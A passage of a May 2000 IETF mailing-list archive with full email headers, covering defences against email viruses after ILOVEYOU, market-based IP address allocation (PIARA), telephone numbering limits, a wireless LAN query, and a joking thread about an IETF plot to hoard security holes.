understood it to be more restricted in only helping police
perform viretapping.
At 21.39 -0700 0-05-07, James P. Salsman wrote:
> I fully agree and have decided to sponsor a contest to correct
> the situation. I will give one share of Microsoft stock to the
> first person who posts, to this IETF Discussion list, a draft
> shareholder resolution that would, in the opinion of Keith Moore
> or his designated alternate, correct the situation if it were
> adopted by Microsoft Corporation as we currently know it.
Certainly, Microsoft software could be designed to make it more
difficult for virus spreading. However, the villains will learn
to get around such features. Compare with spammers. A few years
ago, you could easily detect spamming by checking if a message
did not come from a mailing list you subscribed to, and did not
have your name in any of the recipient field. Today, more and
more spam messages even contain your name in the text in some
kind of greeting "Hella Jacob", which obviously was put there
to confound spam checkers who detect spam by checking if many
identical messages are sent.
At 06.38 -0400 0-05-08, Garreth Jeremiah wrote:
> The "Java" sandbox idea in my mind is a great one.
My experience is that almost ever where I wanted to do something
useful with applets, what I wanted to do was forbidden by
security restrictions.
At 15.05 +0200 0-05-08, Magnus Danielson wrote:
> What you really would like to have is a common
>accept/deny type of list. This would trim down the
>required OK's quite alot. Those which are on the deny list
>would be silently denied and those on the accept list
>would be silently accepted. Only those not existing on
>either of the lists would actually require manual
>intervention in approving.
This will only work if the identity of the allowed senders
was identified with crypthographic methods. Otherwise,
the virus senders will find ways to make believe being
the people you trust.
---
Methods helping the police track virus makers:
(1) Making software more restrictive in accepting foreign
code. Comment: Will help, unless the virus producers
learn to circumwent it. Hass the risk of making life
for ordinary legal users more difficult.
(2) Improve (1) with strong crypthographic methods to
identify trusted senders. Comment: A promising method,
if only strong crypthographic methods get commonly
used. Note however, those of you who want to
protect anonymity: Strong crypthographic methods
are methods to identify people securely, not methods
to allow people to be anonymous.
(3) Tracing and logging feature to find out where the
virus came from. Comment: Virus makers will certainly
try to cheat such systems by incorrect identification
such as senders IP address. But I still believe this
is one of the most promising methods.
(4) Sandbox environments for executing possibly dangerous
code. Comment: Every good programming language should be
designed as a "virtual machine" where a program, when
executed, cannot do anything outside of this protected
environment. I wrote this already in a paper published in
Datamation, December 1975, pp 77-80, with the title
"Languages for Reliable Software". However, the safest
sandboxes are also those most restrictive against doing
legal things well.
(5) Create anti-bodies which scan incoming data and detect
known viruses. This is the main methods of the anti-
virus software sold today. It is, however, becoming
more difficult since the number of viruses is getting
so large that the anti-body creators have problems
keeping up with it.
I do not think this is an either/or situation. To stop
the proliferation of viruses, we should do all of this.
And IETF can certainly help, by designing methods to
support all of these anti-virus activities.
I do not think we can ever stop people from producing
viruses. If, however, we make the risk of getting caught
large enough, most of them will find other methods of
venting their anger at society, like stealing hubcaps
or crashing windows.
There is an obvious conflict between anonymity, privacy,
and detecting criminal behaviour. Different people position
themselves at different places on this scale, but you
cannot deny that the conflict exists. Crime is much
more common in urban than rural areas - just because
people are easier anonymous in the urban areas.
--
Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
for more info see URL: http://www.dsv.su.se/jpalme/
>From owner-ietf-outbound Tue May 9 04:41:22 2000
Received: by ietf.org (8.9.1a/8.9.1a) id EAA12811
for [EMAIL PROTECTED]; Tue, 9 May 2000 04:40:02 -0400 (EDT)
Received: from necom830.hpcl.titech.ac.jp (necom830.hpcl.titech.ac.jp [131.112.32.132])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id EAA12772
for <[EMAIL PROTECTED]>; Tue, 9 May 2000 04:34:35 -0400 (EDT)
From: Masataka Ohta <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Received: by necom830.hpcl.titech.ac.jp (8.6.11/TM2.1)
id RAA13767; Tue, 9 May 2000 17:27:14 +0900
Subject: Re: PIARA (IP address space economics)
In-Reply-To: <[EMAIL PROTECTED]> from Sean Doran at "May
8, 2000 04:44:01 pm"
To: Sean Doran <[EMAIL PROTECTED]>
Date: Tue, 9 May 2000 17:27:13 +0859 ()
CC: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
X-Mailer: ELM [version 2.4ME+ PL68 (25)]
X-Loop: [EMAIL PROTECTED]
Sean;
> | <draft-ohta-address-allocation-00.txt>
>
> While I agree with you that the current usage-based allocation
> system is wrong, your draft's "Assignment Plan" (not more restricted)
> proposes to continue an anti-market single-seller model for IP
> addresses of both IPv4 and IPv6 flavours. There is no scope
> for negotiating with the monopoly seller, given this tariff.
Where in our draft, do you think, IPv6 address allocation
policies are suggested? Can you quote the text?
I, personally, think IPv6 routing table entries must be limited
(to let end systems have a global routing table not to rely on
intelligent intermediate systems) and should be sold in market
(an imortant question is who sets the limit). But, it is an issue
unrelated to the draft on IPv4 address allocation.
For IPv4 addresses, as IPv4 is hopeless, it is unimportant whether
their allocation is anti-market or not.
Masataka Ohta
>From owner-ietf-outbound Tue May 9 09:30:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA19055
for [EMAIL PROTECTED]; Tue, 9 May 2000 09:30:02 -0400 (EDT)
Received: from boreas.isi.edu (boreas.isi.edu [128.9.160.161])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA18855
for <[EMAIL PROTECTED]>; Tue, 9 May 2000 09:22:50 -0400 (EDT)
Received: (from bmanning@localhost)
by boreas.isi.edu (8.8.7/8.8.6) id GAA09057;
Tue, 9 May 2000 06:22:43 -0700 (PDT)
From: Bill Manning <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Subject: Re: IPv6: Past mistakes repeated?
To: [EMAIL PROTECTED] (David R. Conrad)
Date: Tue, 9 May 100 06:22:43 -0700 (PDT)
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]> from "David R. Conrad" at May 7, 0
06:56:12 pm
X-Mailer: ELM [version 2.4 PL24 PGP6]
Content-Type: text
X-Loop: [EMAIL PROTECTED]
Anyone want to by a 3? :)
The value is not the number but its percived routablity.
%
% Heh.
%
% I know someone who wants to offer a class B at seven figures and for class B's
% that "sold" for 5 figures. And you say addresses have no value.
%
% Ah, nostalgia. It's so nice to revisit old "discussions"...
%
% Rgds,
% -drc
%
% Bill Manning wrote:
% >
% > Sigh,
% > Please -NOT- the PIARA again. There is near zero value in the
% > number/address and very real value in the routing slot. Perhaps it is
% > best to simply have ebone route filter on the /16 boundaries to drive
% > home your point. (being cranky this morning)
% >
% > % I would like to see a market develop for IPv4 addresses, along the
% > % lines of the late PIARA work. This would also encourage a
% > % market for routing-table entries, both of which would produce a significant
% > % incentive to dramatically improve upon on-the-fly host-renumbering.
% > %
% > % Sean.
% > %
% > % P.S. by "routing-table entries", I mean of course, not just the
% > % consumption of memory and CPU resources in forwarding packets
% > % in to large numbers of possible destinations, but also the cost
% > % in various resources (bandwidth, CPU, complexity) of acquiring
% > % and propagating information which may lead to routing-table changes.
% > %
% > %
% >
% > --
% > --bill
% >
% > -
% > This message was passed through [EMAIL PROTECTED], which
% > is a sublist of [EMAIL PROTECTED] Not all messages are passed.
% > Decisions on what to pass are made solely by Harald Alvestrand.
%
--
--bill
>From owner-ietf-outbound Tue May 9 10:10:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA20422
for [EMAIL PROTECTED]; Tue, 9 May 2000 10:10:02 -0400 (EDT)
Received: from omega.cisco.com (omega.cisco.com [171.69.63.141])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA20328
for <[EMAIL PROTECTED]>; Tue, 9 May 2000 10:07:59 -0400 (EDT)
Received: from localhost (yakov@localhost)
by omega.cisco.com (8.8.8-Cisco List Logging/8.8.8) with ESMTP id HAA15914;
Tue, 9 May 2000 07:06:53 -0700 (PDT)
Message-Id: <[EMAIL PROTECTED]>
To: "Steven M. Bellovin" <[EMAIL PROTECTED]>
cc: "J. Noel Chiappa" <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
In-reply-to: Your message of "Mon, 08 May 2000 18:18:00 EDT."
<[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <[EMAIL PROTECTED]>
Date: Tue, 09 May 2000 07:06:53 -0700
From: Yakov Rekhter <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
Steve,
> > > There was a similar discussion here about five years ago where some
> > > people proposed market models for address allocation and routing.
> > > Unfortunately, it's not in the archives.
> >
> >I think it was on CIDRD, actually, no?
> >
> > > If anyone has this discussion archived, could they please point me to
> > > it?
> >
> >Well, one thing I do have is the draft of: "Suggestions for Market-Based
> >Allocation of IP Address Blocks", by Paul Resnick (then of AT&T Research, I
> >don't know where he is now - Paul, you out there?), which I have at:
> >
> > http://ana-3.lcs.mit.edu/~jnc/tech/addr_charging.txt
> >
> >It never turned into an RFC (shame, I thought it was a really well thought
> >out draft), and I don't think it's anywhere else permanent.
>
> See http://www.research.att.com/~smb/papers/piara/index.html, by Paul,
> Yakov Rekhter, and myself.
This paper was also published in in "Coordination the Internet", MIT
Press, 1997 (Rekhter, Y., Resnick, P., Bellovin, S., "Financial
Incentives for Route Aggregation and Efficient Address Utilization in
the Internet").
Yakov.
>From owner-ietf-outbound Tue May 9 10:50:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA21632
for [EMAIL PROTECTED]; Tue, 9 May 2000 10:50:02 -0400 (EDT)
Received: from shell5.ba.best.com ([EMAIL PROTECTED] [206.184.139.136])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA21463
for <[EMAIL PROTECTED]>; Tue, 9 May 2000 10:44:32 -0400 (EDT)
Received: (from gds@localhost)
by shell5.ba.best.com (8.9.3/8.9.2/best.sh) id HAA20485
for [EMAIL PROTECTED]; Tue, 9 May 2000 07:44:22 -0700 (PDT)
Date: Tue, 9 May 2000 07:44:22 -0700 (PDT)
From: Greg Skinner <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
In-Reply-To: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
"J. Noel Chiappa" <[EMAIL PROTECTED]> wrote:
> > From: Greg Skinner <[EMAIL PROTECTED]>
> > There was a similar discussion here about five years ago where some
> > people proposed market models for address allocation and routing.
> > Unfortunately, it's not in the archives.
> I think it was on CIDRD, actually, no?
I don't think so. I vaguely recall at some point in the discussion,
it was also suggested that IP addresses be maintained as trusteeships.
At any rate, thanks to all for the links.
--gregbo
>From owner-ietf-outbound Tue May 9 12:10:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA23653
for [EMAIL PROTECTED]; Tue, 9 May 2000 12:10:02 -0400 (EDT)
Received: from camaleon.lander.es ([212.95.212.2])
by ietf.org (8.9.1a/8.9.1a) with SMTP id MAA23617
for <[EMAIL PROTECTED]>; Tue, 9 May 2000 12:09:14 -0400 (EDT)
Received: (qmail 8985 invoked from network); 9 May 2000 16:09:15 -0000
Received: from lince.lander.es (195.76.46.35)
by camaleon.lander.es with SMTP; 9 May 2000 16:09:15 -0000
Received: (qmail 27797 invoked from network); 9 May 2000 16:09:13 -0000
Received: from ppp-47-223.lander.es (HELO salva) (195.76.47.223)
by lince.lander.es with SMTP; 9 May 2000 16:09:13 -0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED] (Unverified)
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32)
Date: Tue, 09 May 2000 18:16:10 +0200
To: Lillian Komlossy <[EMAIL PROTECTED]>
From: Salvador Vidal <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id MAA23617
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
Hello,
At 17:28 04/05/00 -0400, Lillian Komlossy wrote:
>Let's not make it political. We've all been attacked, it is >pointless..
The people who want to do citizens security a political issue probably are
the same comunist reaccionary wich disagree with the future Army
privatization, the ones wich disagree with the new defense private monopoly
wich looking for their economic grow will impulse many wars creating a lot
of progress and employment.
Now seriously, citizens security is not another polical issue but the first
and main one!, because without security others issues hasn´t sense, in
other time I enjoy thinking about the posibilities that will bring the
incorporation of Aritficial Inteligence at information ofert: from the most
romantic message in a bottle ,without address, sealing with inteligence on
the net in order to search the person wich mach with you, to the most
practical mesages wich have diferents behaviors depending on the
replies,..., but without security such things only will bring more risks
and harms, progress is worhless without security!
Free speach will become a wider concept wich involves new free ways of
comunication but don´t call censorship the right of people to stop things
that may harm their information, their belives, their children education or
what ever they want!
At 15:46 04/05/00 -0400, Lillian Komlossy wrote:
>I agree with you - anything that is happening automatically and without
>the chance for the user to say "yes" or "no thank you" is calling for this
>kind of attacks. It should be part of ActiveX or any other technology.
>Nothing should autoexecute.
Completely disagree!, average users can not become security experts in
order to reply these questions, average users need public services, with
private or public management, in wich they can trust.
ILOVEYOU is reponsability of one hacker, its consecuences are
responsability, inresponability in this case, of Internet goberment,
private companies like a private Army don´t have any interest in citizens
security, it´s only responsability of goberment!, and if companies don´t
follow goberment recomendations they must advise people about the risk of
using these products, in a, I hope future, competive market this will be
enought to change companies mind about security issues.
At 15:28 07/05/00 -0400, Keith Moore wrote:
>Jacob,
>
>Given a choice between reducing crime via more government surveillance
>and reducing crime via software that doesn't do stupid things, I'd far
>prefer the latter.
Completely agree!, to put the hacker on jail do not solve the citizens
harm, which is the prevencion plan to quickly stop virus epidemic? when is
going Internet goberment going to asume their security prevention
responsability?...
Best Regards,
Salva
>to bring in the Unix vs Windows debate. Office, Windows, Unix, Linux, Mac
>are all great as long as somebody likes to work with them.
>I personally like Microsoft products, but I respect those who don't - and
>expect the same respect from them.
>
>Lillian Komlossy
>Site Manager
>http://www.dmnews.com
>http://www.imarketingnews.com
>(212) 925-7300 ext. 232
>From owner-ietf-outbound Tue May 9 14:30:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA27412
for [EMAIL PROTECTED]; Tue, 9 May 2000 14:30:02 -0400 (EDT)
Received: from ginger.lcs.mit.edu (ginger.lcs.mit.edu [18.26.0.82])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA27013
for <[EMAIL PROTECTED]>; Tue, 9 May 2000 14:21:52 -0400 (EDT)
Received: (from jnc@localhost)
by ginger.lcs.mit.edu (8.9.1/8.9.1) id OAA20071;
Tue, 9 May 2000 14:21:44 -0400
Date: Tue, 9 May 2000 14:21:44 -0400
From: "J. Noel Chiappa" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
Cc: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> From: Greg Skinner <[EMAIL PROTECTED]>
>> I think it was on CIDRD, actually, no?
> I don't think so.
Well, it turns out that Paul Resnick's draft (which did come out as an I-D,
draft-ietf-cidrd-mktbased-alloc-00.txt) was discussed at some length on CIDRD
in February, 1996. But it sounds like the PIARA discussion was more extensive.
Noel
>From owner-ietf-outbound Tue May 9 16:20:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA00177
for [EMAIL PROTECTED]; Tue, 9 May 2000 16:20:02 -0400 (EDT)
Received: from psi.pair.com (psi.pair.com [209.68.1.39])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA29738
for <[EMAIL PROTECTED]>; Tue, 9 May 2000 16:10:51 -0400 (EDT)
Received: from localhost (kodiak@localhost) by psi.pair.com (8.9.1/8.6.12) with ESMTP
id QAA14042 for <[EMAIL PROTECTED]>; Tue, 9 May 2000 16:10:53 -0400 (EDT)
X-Envelope-To: <[EMAIL PROTECTED]>
Date: Tue, 9 May 2000 16:10:51 -0400 (EDT)
From: chris d koeberle <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Approved: [EMAIL PROTECTED]
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Sun, 7 May 2000, Keith Moore wrote:
> > I don't see how, as long as the software manufacturers ship the software
> > with legal disclaimers, e.g. "We are not responsible for damages ..."
>
> sooner or later that phrase will be recognized as less valuable
> than bovine feces.
(In the U.S.) It has value, but only in disclaiming rights which are not
ordinarily legally present. I cannot escape liability for causing an
auto accident by putting such a label on my car, but such a label can
provide evidence that a customer could not have reasonably believed that a
company was not assuming liability which would not ordinarily have been
legally assigned to it - for instance, if MS was not negligent in
any fashion, but Windows still manages to make my computer disintegrate,
I would have difficulty establishing that MS should pay for my computer
because of implied promises in their advertising.
Even in the stronger case where the license agreement states "by agreeing
to the terms of this license, the user agrees not to hold MS liable for
any damage caused by this product," this is generally worthless if MS is
negligent - you cannot waive rights to recourse for "any and all damage
which might potentially occer."
-=I would imagine that if 1000 Rwandan's were hacked to death AT THE EXPO,
people would sure have raised a stink.=-
>From owner-ietf-outbound Tue May 9 17:20:27 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA01063
for [EMAIL PROTECTED]; Tue, 9 May 2000 17:20:02 -0400 (EDT)
Received: from sfo.erg.sri.com (sfo.erg.sri.com [128.18.100.4])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA00975
for <[EMAIL PROTECTED]>; Tue, 9 May 2000 17:12:27 -0400 (EDT)
Received: from erg.sri.com (walleye.erg.sri.com [128.18.4.214])
by sfo.erg.sri.com (8.9.1/8.9.0) with ESMTP id OAA28300;
Tue, 9 May 2000 14:12:28 -0700 (PDT)
Message-ID: <[EMAIL PROTECTED]>
Date: Tue, 09 May 2000 14:12:28 -0700
From: "Fred L. Templin" <[EMAIL PROTECTED]>
Organization: SRI International
X-Mailer: Mozilla 4.7 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Wireless LAN experiences from the IETF meetings?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Hello,
We are investigating the deployment of a wireless LAN infrastructure
(IEEE 802.11) for our building and were hoping to tap into past
experiences from wireless LAN deployments at the IETF meetings. Are
there any documents online that present "guidelines" for deployment
of wireless LANs at the IETF meetings? Alternatively, can anyone
recommend other documents which might help get us started - especially
along the lines of strategic deployment of IEEE 802.11 access points?
Fred Templin
[EMAIL PROTECTED]
>From owner-ietf-outbound Tue May 9 20:10:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA03052
for [EMAIL PROTECTED]; Tue, 9 May 2000 20:10:02 -0400 (EDT)
Received: from khms.westfalen.de ([EMAIL PROTECTED] [62.155.165.5])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA02989
for <[EMAIL PROTECTED]>; Tue, 9 May 2000 20:04:39 -0400 (EDT)
Received: from root by khms.westfalen.de with local-bsmtp (Exim 3.12 #1)
id 12pJzF-0000rh-01 (Debian); Wed, 10 May 2000 02:04:25 +0200
Received: by khms.westfalen.de (CrossPoint v3.12d.kh5 R/C435);
10 May 2000 02:02:35 +0200
Date: 10 May 2000 01:10:00 +0200
From: [EMAIL PROTECTED] (Kai Henningsen)
To: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
In-Reply-To: <00db01bfae2b$eec52ef0$[EMAIL PROTECTED]>
Subject: Re: IPv6: Past mistakes repeated?
X-Mailer: CrossPoint v3.12d.kh5 R/C435
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Organization: Organisation? Me?! Are you kidding?
References: <00db01bfae2b$eec52ef0$[EMAIL PROTECTED]>
X-No-Junk-Mail: I do not want to get *any* junk mail.
Comment: Unsolicited commercial mail will incur an US$100 handling fee per received
mail.
X-Fix-Your-Modem: +++ATS2=255&WO1
X-Loop: [EMAIL PROTECTED]
[EMAIL PROTECTED] (Anthony Atkielski) wrote on 24.04.00 in
<00db01bfae2b$eec52ef0$[EMAIL PROTECTED]>:
> That is mostly because the telco(s) tried to impose a fixed address length
> on a scheme that really should have remained variable. Telephone numbers
> overseas are truly variable. When you dial 011+3, the remaining digits can
> be anywhere from one to a thousand. The local end just stores them all
Actually, no, it can't. I think the original limit was something like 12
digits, and it's something like 20 now, especially with ISDN.
That's what ITU says, anyway, and what all the makers of telephone
hardware use.
And enough places have switched to better than 12 digits so - guess what -
all the telcos are still doing their best to keep numbers down to 12
digits. Mine's 11 currently (49-251-xxxxxx). North America uses 11 (1-xxx-
xxx-xxxx). Workplace - a newer assignment - theoretically has 12 (49-251-
xxxxxx-x) but actually uses up to 14 (49-251-xxxxxx-xxx), because we need
more than the 20 different numbers we'd otherwise get.
Oh, more than those 12 do get used. For example, if I want to dial a North
American number with provider selection ...
010xx-001-xxx-xxx-xxxx
... and that doesn't count a possible 0 to escape the local PBX. Which
makes it 19 digits. Dangerously close to the limit.
I do know a PBX that crashes when you send it numbers longer than 20
digits. From a major PBX producer.
> But if you use a truly variable scheme, you don't have to assign anything at
> all.
No such scheme seems to exist. At least not in wide use.
> Say Company X wants some addresses, and it is in an area where all addresses
> start with 9482. You just add some digits, tell them what they are, and
> they can add as many addresses as they want behind those digits. All you
> have to care about is that 94825xxxxx gets routed to Company X. The rest of
> the address allocation is their business. They might have just two digits
> on the end, or they might have forty.
Except they cannot actually *use* forty. See above.
> With fixed-length addresses, you're in trouble as soon as you make an
> assignment.
And all addresses in actual practical use are either fixed length, or
variable but limited length (which actually gives you less room than the
same limit with fixed length).
>You might assign 94820000 through 94829999 to Company X. The
> problem is that, if Company X needs only 200 addresses, you've wasted 9800
> addresses, and you can't give them to anyone else. Conversely, if Company X
> ever needs more than 10000 addresses, you have to completely reallocate
> everything, or fragment their address range. Either way, you lose.
And that's exactly how the phone system works.
MfG Kai
>From owner-ietf-outbound Wed May 10 06:02:00 2000
Received: by ietf.org (8.9.1a/8.9.1a) id GAA21226
for [EMAIL PROTECTED]; Wed, 10 May 2000 06:00:02 -0400 (EDT)
Received: from NOD.RESTON.MCI.NET (nod.Reston.mci.net [166.45.6.38])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id FAA21188
for <[EMAIL PROTECTED]>; Wed, 10 May 2000 05:56:08 -0400 (EDT)
Received: from cerf.mci.net ([166.44.137.23])
by shoe.reston.mci.net (PMDF V5.2-32 #40475)
with ESMTPA id <[EMAIL PROTECTED]> for [EMAIL PROTECTED];
Wed, 10 May 2000 05:56:04 EST
Date: Wed, 10 May 2000 05:56:00 -0400
From: "vinton g. cerf" <[EMAIL PROTECTED]>
Subject: RE: IPv6: Past mistakes repeated?
In-reply-to: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
To: [EMAIL PROTECTED], "'Paul Robinson'" <[EMAIL PROTECTED]>,
"'Tripp Lilley'" <[EMAIL PROTECTED]>
Cc: "'Keith Moore'" <[EMAIL PROTECTED]>, "'Greg Skinner'" <[EMAIL PROTECTED]>,
[EMAIL PROTECTED]
Message-id: <[EMAIL PROTECTED]>
MIME-version: 1.0
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
References: <[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7BIT
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7BIT
At 10:39 AM 5/8/2000 -0700, Jim Stephenson-Dunn wrote:
>No! We don't want to fix the holes! We want to keep a record of them
>without telling the admins, and when they misbehave, not only can we pop
>their kneecaps, set fire to their house, release information to their
>families they wouldn't want to be released, but also as a grand finale,
>we can take control of the machine and do what we wanted anyway.
>Eventually, we as the IETF would have complete control of every machine
>connected to the Internet, thereby giving us control of the entire
>planet, which in turn would allow us to park wherever we wanted and
>*not*get*a*ticket*!!!!!! :-)
Dang! Jim's gone and uncovered my nefarious retirement plan. Now I'll
have to think of something else :-(
Jim, you left out the "Nyah-ha-ha-ha-ha-ha!" part...
vint
p.s. apologies to IETF list for cluttering with this. It just slipped out.
=================================================================
I moved to a new MCI WorldCom facility on Nov 11, 1999
MCI WorldCom
22001 Loudoun County Parkway
Building F2, Room 4115, ATTN: Vint Cerf
Ashburn, VA 20147
Telephone (703) 886-1690
FAX (703) 886-0047
"INTERNET IS FOR EVERYONE!"
See you at INET2000, Yokohama, Japan July 18-21, 2000
http://www.isoc.org/inet2000
>From owner-ietf-outbound Wed May 10 06:11:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id GAA21376
for [EMAIL PROTECTED]; Wed, 10 May 2000 06:10:02 -0400 (EDT)
Received: from NOD.RESTON.MCI.NET (nod.Reston.mci.net [166.45.6.38])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id FAA21199
for <[EMAIL PROTECTED]>; Wed, 10 May 2000 05:58:14 -0400 (EDT)
Received: from cerf.mci.net ([166.44.137.23])
by shoe.reston.mci.net (PMDF V5.2-32 #40475)
with ESMTPA id <[EMAIL PROTECTED]> for [EMAIL PROTECTED];
Wed, 10 May 2000 05:58:15 EST
Date: Wed, 10 May 2000 05:58:13 -0400
From: "vinton g. cerf" <[EMAIL PROTECTED]>
Subject: Re: IPv6: Past mistakes repeated?
In-reply-to: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
To: Paul Robinson <[EMAIL PROTECTED]>, Tripp Lilley <[EMAIL PROTECTED]>
Cc: Keith Moore <[EMAIL PROTECTED]>, Greg Skinner <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Message-id: <[EMAIL PROTECTED]>
MIME-version: 1.0
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
References: <[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7BIT
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7BIT
ooops, sorry, I guess it was Paul that uncovered my retirement scheme.
v
At 10:10 AM 5/8/2000 +0100, Paul Robinson wrote:
>No! We don't want to fix the holes! We want to keep a record of them
>without telling the admins, and when they misbehave, not only can we pop
>their kneecaps, set fire to their house, release information to their
>families they wouldn't want to be released, but also as a grand finale,
>we can take control of the machine and do what we wanted anyway.
>Eventually, we as the IETF would have complete control of every machine
>connected to the Internet, thereby giving us control of the entire
>planet, which in turn would allow us to park wherever we wanted and
>*not*get*a*ticket*!!!!!! :-)
>
>--
>Paul Robinson - Developer/Sys Admin @ Akitanet http://www.akitanet.co.uk
>------------------------------------------------------------------------
=================================================================
I moved to a new MCI WorldCom facility on Nov 11, 1999
MCI WorldCom
22001 Loudoun County Parkway
Building F2, Room 4115, ATTN: Vint Cerf
Ashburn, VA 20147
Telephone (703) 886-1690
FAX (703) 886-0047
"INTERNET IS FOR EVERYONE!"
See you at INET2000, Yokohama, Japan July 18-21, 2000
http://www.isoc.org/inet2000
>From owner-ietf-outbound Wed May 10 13:40:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA00642
for [EMAIL PROTECTED]; Wed, 10 May 2000 13:40:02 -0400 (EDT)
Received: from mail.nanospace.com ([EMAIL PROTECTED] [209.213.199.10])
by ietf.org (8.9.1a/8.9.1a) with SMTP id NAA00499
for <[EMAIL PROTECTED]>; Wed, 10 May 2000 13:33:11 -0400 (EDT)
Received: (qmail 31315 invoked by uid 74); 10 May 2000 17:33:11 -0000
Received: from [EMAIL PROTECTED] by mail with scan4virus-0.19 (Clean. Processed in
0.525838 secs); 10/05/2000 10:33:10
Received: from thegrind.yipes.com (HELO zzsf220) (209.213.212.254)
by mail.nanospace.com with SMTP; 10 May 2000 17:33:10 -0000
Reply-To: <[EMAIL PROTECTED]>
From: "Jim Stephenson-Dunn" <[EMAIL PROTECTED]>
To: "'vinton g. cerf'" <[EMAIL PROTECTED]>,
"'Paul Robinson'" <[EMAIL PROTECTED]>,
"'Tripp Lilley'" <[EMAIL PROTECTED]>
Cc: "'Keith Moore'" <[EMAIL PROTECTED]>, "'Greg Skinner'" <[EMAIL PROTECTED]>,
<[EMAIL PROTECTED]>
Subject: RE: IPv6: Past mistakes repeated?
Date: Wed, 10 May 2000 10:33:07 -0700
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
In-Reply-To: <[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
It was Paul, I wanted to know where I got my IETF sunglasses,trench coat and
neuralizer from and wheather I could nominate parking in advance. (Form an
ordely queue behind paul and myself, and no pushing please)
If this "just" happens to help a certain Mr. C to retire in peace and quiet
and run the internet (Via IPv6) from his Montana log cabin, who am I to
disagree. I still want first dibs on the parking, especially in San
Francisco ;->
Jim
Jim Dunn
Senior Network Engineer
San Francisco NOC
-----Original Message-----
From: vinton g. cerf [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, May 10, 2000 2:58 AM
To: Paul Robinson; Tripp Lilley
Cc: Keith Moore; Greg Skinner; [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
ooops, sorry, I guess it was Paul that uncovered my retirement scheme.
v
At 10:10 AM 5/8/2000 +0100, Paul Robinson wrote:
